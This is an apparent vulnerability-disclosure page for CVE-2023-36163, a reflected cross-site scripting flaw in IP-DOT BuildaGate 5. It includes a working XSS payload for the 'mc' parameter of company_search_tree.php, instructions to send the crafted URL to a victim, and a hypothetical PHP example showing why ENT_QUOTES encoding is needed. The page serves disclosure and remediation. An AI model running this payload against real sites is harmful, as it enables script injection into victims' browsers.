CVE-2023-36163 PoC — IP-DOT BuildaGate Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
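Title: IP-DOT BuildaGate Cross-Site Scripting Vulnerability (CVE-2023-36163)
Description: IP-DOT BuildaGate is an application from the company IP-DOT. IP-DOT BuildaGate 5 has a cross-site scripting vulnerability, which stems from allowing a remote attacker to execute arbitrary code via a carefully crafted script.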
Description
Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL
Readme
# Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE: CVE-2023-36163

# PoC:
An attacker needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa

After that, the attacker must send the full URL containing the JS code to the victim, so that the code is injected into the victim's browser.

# Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
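
The payload's leading `'>` suggests that `mc` is reflected inside a single-quoted HTML attribute, which is the context where `htmlspecialchars()` with `ENT_COMPAT` (its default before PHP 8.1) is not sufficient. The following is an added example, not code from the README or from BuildaGate: it compares raw reflection, `ENT_COMPAT` and `ENT_QUOTES` on the payload string published above. The `<input>` markup and all function names are assumptions, since the source of `company_search_tree.php` is not on the page.

```php
<?php
declare(strict_types=1);

// Hypothetical reconstruction: the real company_search_tree.php is not on the
// page. Assumption: mc is echoed into a single-quoted attribute value.
function render(string $encodedMc): string
{
    return "<input type='hidden' name='mc' value='" . $encodedMc . "'>";
}

// "Before": the parameter is reflected without any encoding.
function encode_none(string $mc): string
{
    return $mc;
}

// Incomplete fix: ENT_COMPAT encodes < > & " but leaves ' untouched.
// This was the htmlspecialchars() default before PHP 8.1.
function encode_compat(string $mc): string
{
    return htmlspecialchars($mc, ENT_COMPAT, 'UTF-8');
}

// Hardened: ENT_QUOTES also encodes ' as &#039;. ENT_SUBSTITUTE replaces
// invalid UTF-8 sequences instead of returning an empty string.
function encode_quotes(string $mc): string
{
    return htmlspecialchars($mc, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// True when the encoded value can still end the single-quoted attribute early.
function leaves_attribute(string $encoded): bool
{
    return strpos($encoded, "'") !== false;
}

// The payload string published in the README above, used as test input.
$mc = "aaa'><script>prompt(\"XSS\");</script><div id=\"aaaa";

foreach (['encode_none', 'encode_compat', 'encode_quotes'] as $encoder) {
    $value = $encoder($mc);
    printf("%-14s leaves attribute: %-3s %s\n",
        $encoder, leaves_attribute($value) ? 'yes' : 'no', render($value));
}
```

With `ENT_COMPAT` the `<script>` tag is neutralised but the single quote still closes the attribute, so only the `ENT_QUOTES` variant keeps the whole value inside it.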
File Snapshot

[4.0K] /data/pocs/a4fea069f1accc08ea2540a096254a378e4a6cad
└── [ 554] README.md

0 directories, 1 file